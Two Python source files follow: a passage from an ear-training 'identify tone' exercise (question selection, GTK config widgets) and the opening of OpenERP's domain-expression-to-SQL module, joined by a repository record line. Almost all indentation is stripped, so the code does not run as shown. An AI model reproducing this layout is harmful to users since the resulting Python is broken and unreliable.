self.m_custom_mode = False
def new_question(self):
"""
Return values:
        OK: success, new random tone selected
ERR_PICKY: fail, you are not allowed to select a new tone before you
can identify the one you have now.
ERR_CONFIG: fail, all notes have zero weight or no octaves selected
"""
if self.m_timeout_handle:
GObject.source_remove(self.m_timeout_handle)
self.m_timeout_handle = None
if self.get_bool('config/picky_on_new_question') \
and self.q_status in (self.QSTATUS_NEW, self.QSTATUS_WRONG):
return Teacher.ERR_PICKY
self.m_is_first_question = self.q_status == self.QSTATUS_NO
v = []
for n in mpd.MusicalPitch.notenames:
v.extend([n] * self.get_int(n+"_weight"))
if not v:
return self.ERR_CONFIG
self.m_question = random.choice(v)
v = []
for n in self.OCTAVES:
if self.get_bool("octave"+str(n)):
v.append(n)
if not v:
return self.ERR_CONFIG
self.m_octave = random.choice(v)
self.q_status = self.QSTATUS_NEW
return self.OK
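    # Note on the weighting scheme above (explanatory sketch, not part of the
    # original source): each notename is repeated `weight` times in v, so
    # random.choice(v) picks it with probability weight/sum(weights). E.g.
    # with c_weight=2 and d_weight=1, v == ['c', 'c', 'd'] and 'c' is asked
    # twice as often as 'd'.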
def guess_answer(self, notename):
if notename == self.m_question:
if self.q_status == self.QSTATUS_NEW:
self.m_statistics.add_correct(notename)
self.maybe_auto_new_question()
self.q_status = self.QSTATUS_SOLVED
return 1
else:
if self.q_status == self.QSTATUS_NEW:
self.m_statistics.add_wrong(self.m_question, notename)
self.q_status = self.QSTATUS_WRONG
def play_question(self):
if self.q_status == self.QSTATUS_NO:
return
utils.play_note(4,
mpd.notename_to_int(self.m_question) + self.m_octave * 12)
def give_up(self):
self.q_status = self.QSTATUS_GIVE_UP
def spank_me_play_question(self):
t1 = utils.new_percussion_track()
t1.note(8, 71)
t2 = utils.new_track()
t2.notelen_time(4)
t2.note(4, mpd.notename_to_int(self.m_question)+self.m_octave*12)
soundcard.synth.play_track(t1, t2)
def spank_me(self):
utils.play_perc(4, 71)
class Gui(abstract.Gui):
def __init__(self, teacher):
abstract.Gui.__init__(self, teacher)
self.g_percentage = gu.bLabel(self.practise_box, "")
self.g_percentage.set_name("Heading1")
self.g_piano = inputwidgets.PianoOctaveWithAccelName(
self.on_answer_from_user, self.get_accel_key_list())
self.g_piano.m_visible_accels = not self.get_bool('hide_piano_accels')
def update_accels(*ignore):
self.g_piano.m_keys = self.get_accel_key_list()
self.g_piano.queue_draw()
for notename in mpd.MusicalPitch.notenames:
self.add_watch('tone_%s_ak' % notename, update_accels)
self.practise_box.pack_start(self.g_piano, True, True, 0)
self.g_flashbar = gu.FlashBar()
self.g_flashbar.show()
self.practise_box.pack_start(self.g_flashbar, False, False, 0)
self.practise_box.set_spacing(gu.PAD)
self.std_buttons_add(
('new-tone', self.new_question),
('repeat', lambda _o, self=self: self.m_t.play_question()),
('give_up', self.give_up))
self.practise_box.show_all()
##############
# config_box #
##############
self.config_box.set_spacing(gu.PAD_SMALL)
self.g_config_elems = gu.bVBox(self.config_box, False)
table = Gtk.Table()
table.set_border_width(gu.PAD_SMALL)
frame = Gtk.Frame(label=_("Weight"))
self.g_config_elems.pack_start(frame, False, False, 0)
frame.add(table)
for x, n in [(1, 'cis'), (3, 'dis'), (7, 'fis'),
(9, 'gis'), (11, 'ais')]:
label = Gtk.Label(label=mpd.MusicalPitch.new_from_notename(n).get_user_notename())
label.set_name("Heading2")
label.set_alignment(0.2, 1.0)
table.attach(label, x, x+2, 0, 1, xoptions=Gtk.AttachOptions.FILL)
b = gu.nSpinButton(self.m_exname, n+"_weight",
Gtk.Adjustment(1, 0, 1000, 1, 10), digits=0)
table.attach(b, x, x+2, 1, 2, xoptions=Gtk.AttachOptions.FILL)
for x, n in [(0, 'c'), (2, 'd'), (4, 'e'), (6, 'f'),
(8, 'g'), (10, 'a'), (12, 'b')]:
label = Gtk.Label(label=mpd.MusicalPitch.new_from_notename(n).get_user_notename())
label.set_name("Heading2")
label.set_alignment(0.35, 1.0)
table.attach(label, x, x+2, 2, 3, xoptions=Gtk.AttachOptions.FILL)
b = gu.nSpinButton(self.m_exname, n+"_weight",
Gtk.Adjustment(1, 0, 1000, 1, 10), digits=0)
table.attach(b, x, x+2, 3, 4, xoptions=Gtk.AttachOptions.FILL)
hbox = gu.bHBox(self.g_config_elems, False)
hbox.pack_start(Gtk.Label(_("Octave:")), False, False, padding=4)
for oct in self.m_t.OCTAVES:
b = gu.nCheckButton(self.m_exname, "octave"+str(oct), str(oct),
default_value=1)
hbox.pack_start(b, False, False, 0)
#############
self._add_auto_new_question_gui(self.config_box)
#############
b = gu.nCheckButton('idtone', 'hide_piano_accels', _("Hide _piano keyboard shortcuts"), False)
def show_hide_accels(checkbutton):
self.g_piano.m_visible_accels = not b.get_active()
b.connect('clicked', show_hide_accels)
self.config_box.pack_start(b, False, False, 0)
#
frame = Gtk.Frame(label=_("When you guess wrong"))
vbox = Gtk.VBox()
vbox.set_border_width(gu.PAD_SMALL)
frame.add(vbox)
vbox.pack_start(gu.nCheckButton(self.m_exname,
"warning_sound", _("Play warning sound")), False, False, 0)
self.config_box.pack_start(frame, False, False, 0)
self.config_box.show_all()
##############
# statistics #
##############
self.setup_statisticsviewer(statisticsviewer.StatisticsViewer,
_("Identify tone"))
def get_accel_key_list(self):
v = []
for k in mpd.MusicalPitch.notenames:
self.m_key_bindings['tone_%s_ak' % k] \
= lambda self=self, k=k: self.on_answer_from_user(k)
v.append(self.get_string('tone_%s_ak' % k))
return v
def new_question(self, widget=None):
s = self.m_t.q_status
g = self.m_t.new_question()
if g == Teacher.ERR_CONFIG:
solfege.win.display_error_message(
_("""You have to select some tones practise. Do this on the config page by setting the weight of tones to a value greater than zero."""))
return
elif g == Teacher.OK:
self.std_buttons_new_question()
try:
if self.m_t.m_is_first_question:
self.flash_and_play_first_tone()
else:
self.g_flashbar.clear()
self.m_t.play_question()
except Exception,e:
def cleanup():
self.std_buttons_exception_cleanup()
if not self.standard_exception_handler(e, cleanup):
raise
self.set_percentage_label()
def flash_and_play_first_tone(self):
self.g_flashbar.flash(_("First tone is %s") % mpd.MusicalPitch.new_from_notename(self.m_t.m_question).get_user_notename())
self.m_t.play_question()
def on_answer_from_user(self, notename):
if self.m_t.q_status == self.QSTATUS_NO:
self.g_flashbar.flash(_("Click 'New tone' to begin."))
return
elif self.m_t.q_status == self.QSTATUS_SOLVED:
if self.m_t.guess_answer(notename):
self.g_flashbar.flash(_("Correct, but you have already solved this question"))
else:
self.g_flashbar.flash(_("Wrong, but you have already solved this question"))
elif self.m_t.q_status in (self.QSTATUS_NEW, self.QSTATUS_WRONG):
if self.m_t.guess_answer(notename):
self.g_flashbar.flash(_("Correct"))
self.std_buttons_answer_correct()
else:
try:
if self.m_t.m_is_first_question:
self.flash_and_play_first_tone()
return
self.g_flashbar.flash(_("Wrong"))
self.std_buttons_answer_wrong()
if self.get_bool("warning_sound"):
if self.get_bool("config/auto_repeat_question_if_wrong_answer"):
self.m_t.spank_me_play_question()
else:
self.m_t.spank_me()
else:
if self.get_bool("config/auto_repeat_question_if_wrong_answer"):
self.m_t.play_question()
except Exception, e:
if not self.standard_exception_handler(e):
raise
self.set_percentage_label()
def give_up(self, _o=None):
if self.m_t.q_status == self.QSTATUS_WRONG:
self.g_flashbar.push(_("The answer is: %s")
% mpd.MusicalPitch.new_from_notename(self.m_t.m_question).get_user_notename())
self.m_t.give_up()
self.std_buttons_give_up()
def set_percentage_label(self):
self.g_percentage.set_text("%.1f %%" % (self.m_t.m_statistics.get_percentage_correct()))
def on_start_practise(self):
self.m_t.m_custom_mode = not (
('white_keys_weight' in self.m_t.m_P.header)
or ('black_keys_weight' in self.m_t.m_P.header))
super(Gui, self).on_start_practise()
self.g_flashbar.require_size([
_("Click 'New tone' to begin."),
_("Correct, but you have already solved this question"),
_("Wrong, but you have already solved this question"),
])
if self.m_t.m_custom_mode:
for notename, value in zip(mpd.MusicalPitch.notenames,
self.get_list('custom_mode_cfg')):
try:
value = float(value)
except ValueError:
value = 0.0
self.set_float('%s_weight' % notename, value)
else:
if 'white_keys_weight' in self.m_t.m_P.header:
if type(self.m_t.m_P.header.white_keys_weight) == list \
and len(self.m_t.m_P.header.white_keys_weight) == 7:
for idx, n in enumerate(mpd.MusicalPitch.natural_notenames):
try:
weight = float(self.m_t.m_P.header.white_keys_weight[idx])
except ValueError:
weight = 0.0
self.set_float('%s_weight' % n, weight)
else:
gu.dialog_ok("The white_keys_weight variable in the lesson file '%s' had wrong type" % os.path.abspath(self.m_t.m_P.m_filename), msgtype=Gtk.MessageType.WARNING)
else:
for idx, n in enumerate(mpd.MusicalPitch.notenames):
self.set_float('%s_weight' % n, 0.0)
if 'black_keys_weight' in self.m_t.m_P.header:
if type(self.m_t.m_P.header.black_keys_weight) == list \
and len(self.m_t.m_P.header.black_keys_weight) == 5:
for idx, n in enumerate(mpd.MusicalPitch.sharp_notenames):
try:
weight = float(self.m_t.m_P.header.black_keys_weight[idx])
except ValueError:
weight = 0.0
self.set_float('%s_weight' % n, weight)
else:
gu.dialog_ok("The black_keys_weight variable in the lesson file '%s' had wrong type" % os.path.abspath(self.m_t.m_P.m_filename), msgtype=Gtk.MessageType.WARNING)
else:
for idx, n in enumerate(('cis', 'dis', 'fis', 'gis', 'ais')):
self.set_float('%s_weight' % n, 0.0)
if self.m_t.m_custom_mode:
self.g_config_elems.show()
self.m_t.m_statistics.reset_custom_mode_session(self.m_t.m_P.m_filename)
else:
self.g_config_elems.hide()
self.m_t.m_statistics.reset_session()
self.g_statview.g_heading.set_text("%s - %s" % (_("Identify tone"), self.m_t.m_P.header.title))
self.set_percentage_label()
self.g_flashbar.delayed_flash(self.short_delay,
_("Click 'New tone' to begin."))
self.std_buttons_start_practise()
self.m_t.q_status = self.QSTATUS_NO
def on_end_practise(self):
if self.m_t.m_custom_mode:
self.set_list('custom_mode_cfg', [self.get_float('%s_weight' % x)
for x in mpd.MusicalPitch.notenames])
self.m_t.end_practise()
self.std_buttons_end_practise()
|
Jgarcia-IAS/Fidelizacion_odoo
|
refs/heads/master
|
openerp/osv/expression.py
|
42
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" Domain expression processing
The main duty of this module is to compile a domain expression into a
SQL query. A lot of things should be documented here, but as a first
step in the right direction, some tests in test_osv_expression.yml
might give you some additional information.
For legacy reasons, a domain uses an inconsistent two-level abstract
syntax (domains are regular Python data structures). At the first
level, a domain is an expression made of terms (sometimes called
leaves) and (domain) operators used in prefix notation. The available
operators at this level are '!', '&', and '|'. '!' is a unary 'not',
'&' is a binary 'and', and '|' is a binary 'or'. For instance, here
is a possible domain. (<term> stands for an arbitrary term, more on
this later.)::
['&', '!', <term1>, '|', <term2>, <term3>]
It is equivalent to this pseudo code using infix notation::
(not <term1>) and (<term2> or <term3>)
The second level of syntax deals with the term representation. A term
is a triple of the form (left, operator, right). That is, a term uses
an infix notation, and its available operators and possible left and
right operands differ from those of the previous level. Here is a
possible term::
('company_id.name', '=', 'OpenERP')
The left and right operands don't have the same possible values. The
left operand is a field name (related to the model for which the domain
applies). Actually, the field name can use the dot-notation to
traverse relationships. The right operand is a Python value whose
type should match the used operator and field type. In the above
example, a string is used because the name field of a company has type
string, and because we use the '=' operator. When appropriate, an 'in'
operator can be used, and thus the right operand should be a list.
Note: the non-uniform syntax could have been more uniform, but this
would hide an important limitation of the domain syntax. Say that the
term representation was ['=', 'company_id.name', 'OpenERP']. Used in a
complete domain, this would look like::
['!', ['=', 'company_id.name', 'OpenERP']]
and you would be tempted to believe something like this would be
possible::
['!', ['=', 'company_id.name', ['&', ..., ...]]]
That is, a domain could be a valid operand. But this is not the
case. A domain is really limited to a two-level nature, and cannot
take a recursive form: a domain is not a valid second-level operand.
Unaccent - Accent-insensitive search
OpenERP will use the SQL function 'unaccent' when available for the
'ilike' and 'not ilike' operators, and enabled in the configuration.
Normally the 'unaccent' function is obtained from `the PostgreSQL
'unaccent' contrib module
<http://developer.postgresql.org/pgdocs/postgres/unaccent.html>`_.
.. todo: The following explanation should be moved in some external
installation guide
The steps to install the module might differ on specific PostgreSQL
versions. We give here some instruction for PostgreSQL 9.x on a
Ubuntu system.
Ubuntu doesn't yet come with PostgreSQL 9.x, so an alternative package
source is used. We use Martin Pitt's PPA available at
`ppa:pitti/postgresql
<https://launchpad.net/~pitti/+archive/postgresql>`_.
.. code-block:: sh
> sudo add-apt-repository ppa:pitti/postgresql
> sudo apt-get update
Once the package list is up-to-date, you have to install PostgreSQL
9.0 and its contrib modules.
.. code-block:: sh
> sudo apt-get install postgresql-9.0 postgresql-contrib-9.0
When you want to enable unaccent on some database:
.. code-block:: sh
> psql9 <database> -f /usr/share/postgresql/9.0/contrib/unaccent.sql
Here :program:`psql9` is an alias for the newly installed PostgreSQL
9.0 tool, together with the correct port if necessary (for instance if
PostgreSQL 8.4 is running on 5432). (Other aliases can be used for
createdb and dropdb.)
.. code-block:: sh
> alias psql9='/usr/lib/postgresql/9.0/bin/psql -p 5433'
You can check unaccent is working:
.. code-block:: sh
> psql9 <database> -c"select unaccent('hélène')"
Finally, to instruct OpenERP to really use the unaccent function, you have to
start the server specifying the ``--unaccent`` flag.
"""
import collections
import logging
import traceback
import openerp.modules
from . import fields
from ..models import MAGIC_COLUMNS, BaseModel
import openerp.tools as tools
# Domain operators.
NOT_OPERATOR = '!'
OR_OPERATOR = '|'
AND_OPERATOR = '&'
DOMAIN_OPERATORS = (NOT_OPERATOR, OR_OPERATOR, AND_OPERATOR)
# List of available term operators. It is also possible to use the '<>'
# operator, which is strictly the same as '!='; the latter should be preferred
# for consistency. This list doesn't contain '<>' as it is simplified to '!='
# by the normalize_leaf() function (so the latter part of the code deals with
# only one representation).
# The internal (i.e. not available to the user) operators 'inselect' and
# 'not inselect' are also used; their right operand has the form (subselect, params).
TERM_OPERATORS = ('=', '!=', '<=', '<', '>', '>=', '=?', '=like', '=ilike',
'like', 'not like', 'ilike', 'not ilike', 'in', 'not in',
'child_of')
# A subset of the above operators, with a 'negative' semantic. When the
# expressions 'in NEGATIVE_TERM_OPERATORS' or 'not in NEGATIVE_TERM_OPERATORS' are used in the code
# below, this doesn't necessarily mean that any of those NEGATIVE_TERM_OPERATORS is
# legal in the processed term.
NEGATIVE_TERM_OPERATORS = ('!=', 'not like', 'not ilike', 'not in')
TRUE_LEAF = (1, '=', 1)
FALSE_LEAF = (0, '=', 1)
TRUE_DOMAIN = [TRUE_LEAF]
FALSE_DOMAIN = [FALSE_LEAF]
_logger = logging.getLogger(__name__)
# --------------------------------------------------
# Generic domain manipulation
# --------------------------------------------------
def normalize_domain(domain):
"""Returns a normalized version of ``domain_expr``, where all implicit '&' operators
have been made explicit. One property of normalized domain expressions is that they
can be easily combined together as if they were single domain components.
"""
assert isinstance(domain, (list, tuple)), "Domains to normalize must have a 'domain' form: a list or tuple of domain components"
if not domain:
return TRUE_DOMAIN
result = []
expected = 1 # expected number of expressions
op_arity = {NOT_OPERATOR: 1, AND_OPERATOR: 2, OR_OPERATOR: 2}
for token in domain:
if expected == 0: # more than expected, like in [A, B]
result[0:0] = [AND_OPERATOR] # put an extra '&' in front
expected = 1
result.append(token)
if isinstance(token, (list, tuple)): # domain term
expected -= 1
else:
expected += op_arity.get(token, 0) - 1
assert expected == 0, 'This domain is syntactically not correct: %s' % (domain)
return result
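# A minimal usage sketch (illustrative field names), relying only on the
# behaviour documented above: two consecutive terms get an implicit '&'.
# >>> normalize_domain([('foo', '=', 1), ('bar', '!=', 2)])
# ['&', ('foo', '=', 1), ('bar', '!=', 2)]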
def combine(operator, unit, zero, domains):
"""Returns a new domain expression where all domain components from ``domains``
have been added together using the binary operator ``operator``. The given
domains must be normalized.
:param unit: the identity element of the domains "set" with regard to the operation
performed by ``operator``, i.e the domain component ``i`` which, when
combined with any domain ``x`` via ``operator``, yields ``x``.
E.g. [(1,'=',1)] is the typical unit for AND_OPERATOR: adding it
to any domain component gives the same domain.
:param zero: the absorbing element of the domains "set" with regard to the operation
performed by ``operator``, i.e the domain component ``z`` which, when
combined with any domain ``x`` via ``operator``, yields ``z``.
E.g. [(1,'=',1)] is the typical zero for OR_OPERATOR: as soon as
you see it in a domain component the resulting domain is the zero.
:param domains: a list of normalized domains.
"""
result = []
count = 0
for domain in domains:
if domain == unit:
continue
if domain == zero:
return zero
if domain:
result += domain
count += 1
result = [operator] * (count - 1) + result
return result
def AND(domains):
"""AND([D1,D2,...]) returns a domain representing D1 and D2 and ... """
return combine(AND_OPERATOR, TRUE_DOMAIN, FALSE_DOMAIN, domains)
def OR(domains):
"""OR([D1,D2,...]) returns a domain representing D1 or D2 or ... """
return combine(OR_OPERATOR, FALSE_DOMAIN, TRUE_DOMAIN, domains)
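# A hedged usage sketch (made-up field names); note that the inputs must
# already be normalized domains:
# >>> AND([[('a', '=', 1)], [('b', '=', 2)]])
# ['&', ('a', '=', 1), ('b', '=', 2)]
# >>> OR([[('a', '=', 1)], TRUE_DOMAIN])  # TRUE_DOMAIN absorbs the OR
# [(1, '=', 1)]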
def distribute_not(domain):
""" Distribute any '!' domain operators found inside a normalized domain.
Because we don't use SQL semantics for processing a 'left not in right'
query (i.e. our 'not in' is not simply translated to a SQL 'not in'),
it means that a '! left in right' can not be simply processed
by __leaf_to_sql by first emitting code for 'left in right' then wrapping
the result with 'not (...)', as it would result in a 'not in' at the SQL
level.
This function is thus responsible for pushing any '!' domain operators
inside the terms themselves. For example::
['!','&',('user_id','=',4),('partner_id','in',[1,2])]
will be turned into::
['|',('user_id','!=',4),('partner_id','not in',[1,2])]
"""
def negate(leaf):
"""Negates and returns a single domain leaf term,
using the opposite operator if possible"""
left, operator, right = leaf
mapping = {
'<': '>=',
'>': '<=',
'<=': '>',
'>=': '<',
'=': '!=',
'!=': '=',
}
if operator in ('in', 'like', 'ilike'):
operator = 'not ' + operator
return [(left, operator, right)]
if operator in ('not in', 'not like', 'not ilike'):
operator = operator[4:]
return [(left, operator, right)]
if operator in mapping:
operator = mapping[operator]
return [(left, operator, right)]
return [NOT_OPERATOR, (left, operator, right)]
def distribute_negate(domain):
"""Negate the domain ``subtree`` rooted at domain[0],
leaving the rest of the domain intact, and return
(negated_subtree, untouched_domain_rest)
"""
if is_leaf(domain[0]):
return negate(domain[0]), domain[1:]
if domain[0] == AND_OPERATOR:
done1, todo1 = distribute_negate(domain[1:])
done2, todo2 = distribute_negate(todo1)
return [OR_OPERATOR] + done1 + done2, todo2
if domain[0] == OR_OPERATOR:
done1, todo1 = distribute_negate(domain[1:])
done2, todo2 = distribute_negate(todo1)
return [AND_OPERATOR] + done1 + done2, todo2
if not domain:
return []
if domain[0] != NOT_OPERATOR:
return [domain[0]] + distribute_not(domain[1:])
if domain[0] == NOT_OPERATOR:
done, todo = distribute_negate(domain[1:])
return done + distribute_not(todo)
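# A usage sketch grounded in the docstring example above:
# >>> distribute_not(['!', '&', ('user_id', '=', 4), ('partner_id', 'in', [1, 2])])
# ['|', ('user_id', '!=', 4), ('partner_id', 'not in', [1, 2])]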
# --------------------------------------------------
# Generic leaf manipulation
# --------------------------------------------------
def _quote(to_quote):
if '"' not in to_quote:
return '"%s"' % to_quote
return to_quote
def generate_table_alias(src_table_alias, joined_tables=[]):
""" Generate a standard table alias name. An alias is generated as following:
- the base is the source table name (that can already be an alias)
- then, each joined table is added in the alias using a 'link field name'
that is used to render unique aliases for a given path
- returns a tuple composed of the alias, and the full table alias to be
added in a from condition with quoting done
Examples:
- src_table_alias='res_users', joined_tables=[]:
alias = ('res_users','"res_users"')
- src_table_alias='res_users', joined_tables=[(res.partner, 'parent_id')]:
alias = ('res_users__parent_id', '"res_partner" as "res_users__parent_id"')
:param string src_table_alias: source table name (or existing table alias)
:param list joined_tables: list of tuples
(dst_model, link_field)
:return tuple: (table_alias, alias statement for from clause with quotes added)
"""
alias = src_table_alias
if not joined_tables:
return '%s' % alias, '%s' % _quote(alias)
for link in joined_tables:
alias += '__' + link[1]
assert len(alias) < 64, 'Table alias name %s is longer than the 64 characters size accepted by default in postgresql.' % alias
return '%s' % alias, '%s as %s' % (_quote(joined_tables[-1][0]), _quote(alias))
def get_alias_from_query(from_query):
""" :param string from_query: is something like :
- '"res_partner"' OR
- '"res_partner" as "res_users__partner_id"''
"""
from_splitted = from_query.split(' as ')
if len(from_splitted) > 1:
return from_splitted[0].replace('"', ''), from_splitted[1].replace('"', '')
else:
return from_splitted[0].replace('"', ''), from_splitted[0].replace('"', '')
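# A usage sketch based on the docstring above:
# >>> get_alias_from_query('"res_partner" as "res_users__partner_id"')
# ('res_partner', 'res_users__partner_id')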
def normalize_leaf(element):
""" Change a term's operator to some canonical form, simplifying later
processing. """
if not is_leaf(element):
return element
left, operator, right = element
original = operator
operator = operator.lower()
if operator == '<>':
operator = '!='
if isinstance(right, bool) and operator in ('in', 'not in'):
_logger.warning("The domain term '%s' should use the '=' or '!=' operator." % ((left, original, right),))
operator = '=' if operator == 'in' else '!='
if isinstance(right, (list, tuple)) and operator in ('=', '!='):
_logger.warning("The domain term '%s' should use the 'in' or 'not in' operator." % ((left, original, right),))
operator = 'in' if operator == '=' else 'not in'
return left, operator, right
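# A small usage sketch (illustrative term): the deprecated '<>' operator is
# canonicalized to '!='.
# >>> normalize_leaf(('name', '<>', 'foo'))
# ('name', '!=', 'foo')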
def is_operator(element):
""" Test whether an object is a valid domain operator. """
return isinstance(element, basestring) and element in DOMAIN_OPERATORS
def is_leaf(element, internal=False):
""" Test whether an object is a valid domain term:
- is a list or tuple
- with 3 elements
- its second element is a valid operator
:param tuple element: a leaf in form (left, operator, right)
:param boolean internal: allow or not the 'inselect' internal operator
in the term. This should be always left to False.
Note: OLD TODO change the share wizard to use this function.
"""
INTERNAL_OPS = TERM_OPERATORS + ('<>',)
if internal:
INTERNAL_OPS += ('inselect', 'not inselect')
return (isinstance(element, tuple) or isinstance(element, list)) \
and len(element) == 3 \
and element[1] in INTERNAL_OPS \
and ((isinstance(element[0], basestring) and element[0])
or element in (TRUE_LEAF, FALSE_LEAF))
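# For instance (illustrative values):
# >>> is_leaf(('name', '=', 'foo'))
# True
# >>> is_leaf(AND_OPERATOR)
# False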
# --------------------------------------------------
# SQL utils
# --------------------------------------------------
def select_from_where(cr, select_field, from_table, where_field, where_ids, where_operator):
# todo: merge into parent query as sub-query
res = []
if where_ids:
if where_operator in ['<', '>', '>=', '<=']:
cr.execute('SELECT "%s" FROM "%s" WHERE "%s" %s %%s' % \
(select_field, from_table, where_field, where_operator),
(where_ids[0],)) # TODO shouldn't this be min/max(where_ids) ?
res = [r[0] for r in cr.fetchall()]
else: # TODO where_operator is supposed to be 'in'? It is called with child_of...
for i in range(0, len(where_ids), cr.IN_MAX):
subids = where_ids[i:i + cr.IN_MAX]
cr.execute('SELECT "%s" FROM "%s" WHERE "%s" IN %%s' % \
(select_field, from_table, where_field), (tuple(subids),))
res.extend([r[0] for r in cr.fetchall()])
return res
def select_distinct_from_where_not_null(cr, select_field, from_table):
cr.execute('SELECT distinct("%s") FROM "%s" where "%s" is not null' % (select_field, from_table, select_field))
return [r[0] for r in cr.fetchall()]
def get_unaccent_wrapper(cr):
if openerp.modules.registry.RegistryManager.get(cr.dbname).has_unaccent:
return lambda x: "unaccent(%s)" % (x,)
return lambda x: x
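# A hedged sketch (cr stands for a valid database cursor): when the registry
# reports unaccent support, SQL snippets get wrapped, otherwise they are
# returned unchanged.
# >>> get_unaccent_wrapper(cr)('"res_partner"."name"')
# 'unaccent("res_partner"."name")'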
# --------------------------------------------------
# ExtendedLeaf class for managing leafs and contexts
# -------------------------------------------------
class ExtendedLeaf(object):
""" Class wrapping a domain leaf, and giving some services and management
features on it. In particular it manages join contexts to be able to
construct queries through multiple models.
"""
# --------------------------------------------------
# Join / Context manipulation
# running examples:
# - res_users.name, like, foo: name is on res_partner, not on res_users
# - res_partner.bank_ids.name, like, foo: bank_ids is a one2many with _auto_join
# - res_partner.state_id.name, like, foo: state_id is a many2one with _auto_join
# A join:
# - link between src_table and dst_table, using src_field and dst_field
# i.e.: inherits: res_users.partner_id = res_partner.id
# i.e.: one2many: res_partner.id = res_partner_bank.partner_id
# i.e.: many2one: res_partner.state_id = res_country_state.id
# - done in the context of a field
# i.e.: inherits: 'partner_id'
# i.e.: one2many: 'bank_ids'
# i.e.: many2one: 'state_id'
# - table names use aliases: initial table followed by the context field
# names, joined using a '__'
# i.e.: inherits: res_partner as res_users__partner_id
# i.e.: one2many: res_partner_bank as res_partner__bank_ids
# i.e.: many2one: res_country_state as res_partner__state_id
# - join conditions use aliases
# i.e.: inherits: res_users.partner_id = res_users__partner_id.id
# i.e.: one2many: res_partner.id = res_partner__bank_ids.partner_id
# i.e.: many2one: res_partner.state_id = res_partner__state_id.id
# Variables explanation:
# - src_table: working table before the join
# -> res_users, res_partner, res_partner
# - dst_table: working table after the join
# -> res_partner, res_partner_bank, res_country_state
# - src_table_link_name: field name used to link the src table, not
# necessarily a field (because 'id' is not a field instance)
# i.e.: inherits: 'partner_id', found in the inherits of the current table
# i.e.: one2many: 'id', not a field
# i.e.: many2one: 'state_id', the current field name
# - dst_table_link_name: field name used to link the dst table, not
# necessarily a field (because 'id' is not a field instance)
# i.e.: inherits: 'id', not a field
# i.e.: one2many: 'partner_id', _fields_id of the current field
# i.e.: many2one: 'id', not a field
# - context_field_name: field name used as a context to make the alias
# i.e.: inherits: 'partner_id': found in the inherits of the current table
# i.e.: one2many: 'bank_ids': current field name
# i.e.: many2one: 'state_id': current field name
# --------------------------------------------------
def __init__(self, leaf, model, join_context=None):
""" Initialize the ExtendedLeaf
:attr [string, tuple] leaf: operator or tuple-formatted domain
expression
:attr obj model: current working model
:attr list _models: list of chained models, updated when
adding joins
:attr list join_context: list of join contexts. This is a list of
tuples like ``(lhs, table, lhs_col, col, link)``
where
lhs
source (left hand) model
model
destination (right hand) model
lhs_col
source model column for join condition
col
destination model column for join condition
link
link column between source and destination model
that is not necessarily (but generally) a real column used
in the condition (i.e. in many2one); this link is used to
compute aliases
"""
assert isinstance(model, BaseModel), 'Invalid leaf creation without table'
self.join_context = join_context or []
self.leaf = leaf
# normalize the leaf's operator
self.normalize_leaf()
# set working variables; handle the context stack and previous tables
self.model = model
self._models = []
for item in self.join_context:
self._models.append(item[0])
self._models.append(model)
# check validity
self.check_leaf()
def __str__(self):
return '<osv.ExtendedLeaf: %s on %s (ctx: %s)>' % (str(self.leaf), self.model._table, ','.join(self._get_context_debug()))
def generate_alias(self):
links = [(context[1]._table, context[4]) for context in self.join_context]
alias, alias_statement = generate_table_alias(self._models[0]._table, links)
return alias
def add_join_context(self, model, lhs_col, table_col, link):
""" See above comments for more details. A join context is a tuple like:
``(lhs, model, lhs_col, col, link)``
After adding the join, the model of the current leaf is updated.
"""
self.join_context.append((self.model, model, lhs_col, table_col, link))
self._models.append(model)
self.model = model
def get_join_conditions(self):
conditions = []
alias = self._models[0]._table
for context in self.join_context:
previous_alias = alias
alias += '__' + context[4]
conditions.append('"%s"."%s"="%s"."%s"' % (previous_alias, context[2], alias, context[3]))
return conditions
def get_tables(self):
tables = set()
links = []
for context in self.join_context:
links.append((context[1]._table, context[4]))
alias, alias_statement = generate_table_alias(self._models[0]._table, links)
tables.add(alias_statement)
return tables
def _get_context_debug(self):
names = ['"%s"."%s"="%s"."%s" (%s)' % (item[0]._table, item[2], item[1]._table, item[3], item[4]) for item in self.join_context]
return names
# --------------------------------------------------
# Leaf manipulation
# --------------------------------------------------
def check_leaf(self):
""" Leaf validity rules:
- a valid leaf is an operator or a leaf
- a valid leaf has a field object, unless
- it is not a tuple
- it is an inherited field
- left is id, operator is 'child_of'
- left is in MAGIC_COLUMNS
"""
if not is_operator(self.leaf) and not is_leaf(self.leaf, True):
raise ValueError("Invalid leaf %s" % str(self.leaf))
def is_operator(self):
return is_operator(self.leaf)
def is_true_leaf(self):
return self.leaf == TRUE_LEAF
def is_false_leaf(self):
return self.leaf == FALSE_LEAF
def is_leaf(self, internal=False):
return is_leaf(self.leaf, internal=internal)
def normalize_leaf(self):
self.leaf = normalize_leaf(self.leaf)
return True
def create_substitution_leaf(leaf, new_elements, new_model=None):
""" From a leaf, create a new leaf (based on the new_elements tuple
and new_model), that will have the same join context. Used to
insert equivalent leafs in the processing stack. """
if new_model is None:
new_model = leaf.model
new_join_context = [tuple(context) for context in leaf.join_context]
new_leaf = ExtendedLeaf(new_elements, new_model, join_context=new_join_context)
return new_leaf
class expression(object):
""" Parse a domain expression
Uses real Polish (prefix) notation.
Leafs are still in a ('foo', '=', 'bar') format
For more info: http://christophe-simonis-at-tiny.blogspot.com/2008/08/new-new-domain-notation.html
"""
def __init__(self, cr, uid, exp, table, context):
""" Initialize expression object and automatically parse the expression
right after initialization.
:param exp: expression (using the ('foo', '=', 'bar') domain term format)
:param table: root model
:attr list result: list that will hold the result of the parsing
as a list of ExtendedLeaf
:attr list joins: list of join conditions, such as
(res_country_state."id" = res_partner."state_id")
:attr root_model: base model for the query
:attr list expression: the domain expression, that will be normalized
and prepared
"""
self._unaccent = get_unaccent_wrapper(cr)
self.joins = []
self.root_model = table
# normalize and prepare the expression for parsing
self.expression = distribute_not(normalize_domain(exp))
# parse the domain expression
self.parse(cr, uid, context=context)
# ----------------------------------------
